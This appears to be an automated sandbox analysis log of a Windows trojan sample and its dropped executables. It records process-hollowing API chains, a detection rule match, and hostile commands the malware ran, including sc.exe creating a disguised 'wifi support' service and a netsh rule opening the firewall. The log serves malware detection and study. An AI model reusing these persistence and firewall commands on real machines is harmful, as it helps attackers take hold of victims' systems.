                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: 12_2_00401FF1
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: 12_2_0040158E
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: 12_2_004015A6
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: 12_2_004015BC
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: 12_2_00411065
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: 12_2_00412A02
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: 12_2_0040CAC5
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: 12_2_00410B21
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: 12_2_004115A9
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: 12_2_0208160C
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: 12_2_020815DE
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeCode function: 12_2_020815F6
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00410800
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00411280
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_004103F0
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_004109F0
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00690640
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00690C40
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_00690A50
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exeCode function: 15_2_006914D0
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeCode function: 17_2_0040C913
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeCode function: 17_2_0042B0A0
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeCode function: 17_2_0042A2C0
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeCode function: 17_2_00424C30
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeCode function: 18_2_017B96F0
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeCode function: 18_2_017B0470
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeCode function: 18_2_017B0462
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeCode function: 18_2_05811810
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeCode function: 18_2_058153F8
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeCode function: 18_2_05810448
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeCode function: 18_2_05812E48
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeCode function: 18_2_05821528
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeCode function: 18_2_0582AD68
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeCode function: 18_2_05822C88
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeCode function: 18_2_0582A430
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeCode function: 18_2_05824758
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeCode function: 18_2_058208B0
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeCode function: 18_2_058290D3
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeCode function: 32_2_0040C913
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeCode function: 32_2_0042B0A0
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeCode function: 32_2_0042A2C0
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeCode function: 32_2_00424C30
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeCode function: 17_2_00401280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError,
                      Source: ECD2MpEBSf.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: ECD2MpEBSf.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: ECD2MpEBSf.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: ECD2MpEBSf.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: A332.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: A332.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: A332.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: FB58.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: FB58.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: FB58.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: BB8A.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: BB8A.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: BB8A.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: CCB2.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: CCB2.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: CCB2.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: CCB2.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 6C37.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: D936.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: D936.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: D936.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: D936.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: D502.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: jgdhbua.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: jgdhbua.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: jgdhbua.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: jgdhbua.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: krmdinzg.exe.17.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: krmdinzg.exe.17.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: krmdinzg.exe.17.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: krmdinzg.exe.17.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exe | Section loaded: mscorjit.dll
                      Source: ECD2MpEBSf.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\AppData\Local\Temp\A4DE.exe, type: DROPPED | Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                      Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\SysWOW64\qeprvgom\
                      Source: C:\Users\user\AppData\Local\Temp\D936.exe | Code function: String function: 0041E100 appears 32 times
                      Source: C:\Users\user\AppData\Local\Temp\D936.exe | Code function: String function: 0040EE2A appears 40 times
                      Source: C:\Users\user\AppData\Local\Temp\D936.exe | Code function: String function: 00402544 appears 53 times
                      Source: C:\Users\user\AppData\Local\Temp\D936.exe | Code function: String function: 022B2794 appears 35 times
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Code function: String function: 00422A90 appears 133 times
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Code function: String function: 0041E210 appears 172 times
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe | Code function: String function: 0041E100 appears 32 times
                      Source: C:\Users\user\AppData\Local\Temp\CCB2.exe | Code function: String function: 004048D0 appears 460 times
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Code function: 0_2_00570110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Code function: 1_2_00401962 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Code function: 1_2_0040196D Sleep,NtTerminateProcess,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Code function: 1_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Code function: 1_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Code function: 1_2_00401A0B NtTerminateProcess,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Code function: 1_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Code function: 1_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Code function: 1_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Code function: 1_2_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Code function: 1_2_00402491 NtOpenKey,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Code function: 1_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Code function: 1_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Code function: 1_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Code function: 1_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Code function: 1_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Code function: 1_1_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Code function: 1_1_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Roaming\jgdhbua | Code function: 9_2_006F0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Source: C:\Users\user\AppData\Roaming\jgdhbua | Code function: 11_2_00401962 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\jgdhbua | Code function: 11_2_0040196D Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\jgdhbua | Code function: 11_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\jgdhbua | Code function: 11_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\AppData\Roaming\jgdhbua | Code function: 11_2_00401A0B NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\jgdhbua | Code function: 11_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\jgdhbua | Code function: 11_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\jgdhbua | Code function: 11_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\jgdhbua | Code function: 11_2_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\jgdhbua | Code function: 11_2_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Local\Temp\D936.exe | Code function: 17_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle,
                      Source: A332.exe.5.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: FB58.exe.5.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: BB8A.exe.5.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: E3A9.exe.5.dr | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                      Source: 9889.exe.5.dr | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                      Source: E3A9.exe.5.dr | Static PE information: Section: ZLIB complexity 1.00044194799
                      Source: E3A9.exe.5.dr | Static PE information: Section: ZLIB complexity 1.00537109375
                      Source: E3A9.exe.5.dr | Static PE information: Section: ZLIB complexity 1.00051229508
                      Source: E3A9.exe.5.dr | Static PE information: Section: ZLIB complexity 1.0107421875
                      Source: 6C37.exe.5.dr | Static PE information: Section: .didata ZLIB complexity 0.999523355577
                      Source: 9889.exe.5.dr | Static PE information: Section: ZLIB complexity 1.00044194799
                      Source: 9889.exe.5.dr | Static PE information: Section: ZLIB complexity 1.00537109375
                      Source: 9889.exe.5.dr | Static PE information: Section: ZLIB complexity 1.00051229508
                      Source: 9889.exe.5.dr | Static PE information: Section: ZLIB complexity 1.0107421875
                      Source: ECD2MpEBSf.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe | Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
                      Source: C:\Users\user\AppData\Local\Temp\D936.exe | Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\jgdhbua
                      Source: classification engine | Classification label: mal100.troj.evad.winEXE@58/27@91/19
                      Source: C:\Users\user\AppData\Local\Temp\D936.exe | File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\AppData\Local\Temp\D936.exe | Code function: 17_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe | Code function: 32_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                      Source: C:\Users\user\AppData\Local\Temp\D936.exe | Code function: 17_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                      Source: ECD2MpEBSf.exeVirustotal: Detection: 36%
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\ECD2MpEBSf.exe "C:\Users\user\Desktop\ECD2MpEBSf.exe"
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeProcess created: C:\Users\user\Desktop\ECD2MpEBSf.exe "C:\Users\user\Desktop\ECD2MpEBSf.exe"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\jgdhbua C:\Users\user\AppData\Roaming\jgdhbua
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaProcess created: C:\Users\user\AppData\Roaming\jgdhbua C:\Users\user\AppData\Roaming\jgdhbua
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\BB8A.exe C:\Users\user\AppData\Local\Temp\BB8A.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6816 -ip 6816
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\CCB2.exe C:\Users\user\AppData\Local\Temp\CCB2.exe
                      Source: C:\Users\user\AppData\Local\Temp\BB8A.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6816 -s 520
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\D936.exe C:\Users\user\AppData\Local\Temp\D936.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3D34.exe C:\Users\user\AppData\Local\Temp\3D34.exe
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\qeprvgom\
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\krmdinzg.exe" C:\Windows\SysWOW64\qeprvgom\
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create qeprvgom binPath= "C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe /d\"C:\Users\user\AppData\Local\Temp\D936.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description qeprvgom "wifi internet conection
                      Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start qeprvgom
                      Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe /d"C:\Users\user\AppData\Local\Temp\D936.exe"
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeProcess created: C:\Users\user\AppData\Local\Temp\3D34.exe C:\Users\user\AppData\Local\Temp\3D34.exe
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exeProcess created: C:\Users\user\AppData\Local\Temp\3D34.exe C:\Users\user\AppData\Local\Temp\3D34.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A332.exe C:\Users\user\AppData\Local\Temp\A332.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\CADF.exe C:\Users\user\AppData\Local\Temp\CADF.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\jgdhbua C:\Users\user\AppData\Roaming\jgdhbua
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\D502.exe C:\Users\user\AppData\Local\Temp\D502.exe
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaProcess created: C:\Users\user\AppData\Roaming\jgdhbua C:\Users\user\AppData\Roaming\jgdhbua
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E3A9.exe C:\Users\user\AppData\Local\Temp\E3A9.exe
                      Source: C:\Users\user\AppData\Local\Temp\CADF.exeProcess created: C:\Users\user\AppData\Local\Temp\CADF.exe C:\Users\user\AppData\Local\Temp\CADF.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\FB58.exe C:\Users\user\AppData\Local\Temp\FB58.exe
                      Source: C:\Users\user\AppData\Local\Temp\E3A9.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exeProcess created: C:\Users\user\Desktop\ECD2MpEBSf.exe "C:\Users\user\Desktop\ECD2MpEBSf.exe"
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\BB8A.exe C:\Users\user\AppData\Local\Temp\BB8A.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\CCB2.exe C:\Users\user\AppData\Local\Temp\CCB2.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\D936.exe C:\Users\user\AppData\Local\Temp\D936.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3D34.exe C:\Users\user\AppData\Local\Temp\3D34.exe
                      Source: C:\Users\user\AppData\Roaming\jgdhbuaProcess created: C:\Users\user\AppData\Roaming\jgdhbua C:\Users\user\AppData\Roaming\jgdhbua
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6816 -ip 6816
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6816 -s 520
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\qeprvgom\
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\krmdinzg.exe" C:\Windows\SysWOW64\qeprvgom\
                      Source: C:\Users\user\AppData\Local\Temp\D936.exe | Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create qeprvgom binPath= "C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe /d\"C:\Users\user\AppData\Local\Temp\D936.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Users\user\AppData\Local\Temp\D936.exe | Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description qeprvgom "wifi internet conection
                      Source: C:\Users\user\AppData\Local\Temp\D936.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start qeprvgom
                      Source: C:\Users\user\AppData\Local\Temp\D936.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exe | Process created: C:\Users\user\AppData\Local\Temp\3D34.exe C:\Users\user\AppData\Local\Temp\3D34.exe
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exe | Process created: C:\Users\user\AppData\Local\Temp\3D34.exe C:\Users\user\AppData\Local\Temp\3D34.exe
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                      Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\BB8A.tmp
                      Source: C:\Users\user\Desktop\ECD2MpEBSf.exe | Code function: 0_2_00419B15 SetLastError,GetConsoleCursorInfo,GetProfileStringA,WriteProfileSectionW,GetProfileStringW,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryW,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoW,ReadConsoleOutputCharacterW,GlobalUnWire,GetProcessHeap,GetProcessHeap,WritePrivateProfileStringW,SetPriorityClass,
                      Source: C:\Users\user\AppData\Local\Temp\3D34.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \BaseNamedObjects\Local\SM0:6876:64:WilError_01
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4672:120:WilError_01
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:64:120:WilError_01
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3716:120:WilError_01
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6424:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6816
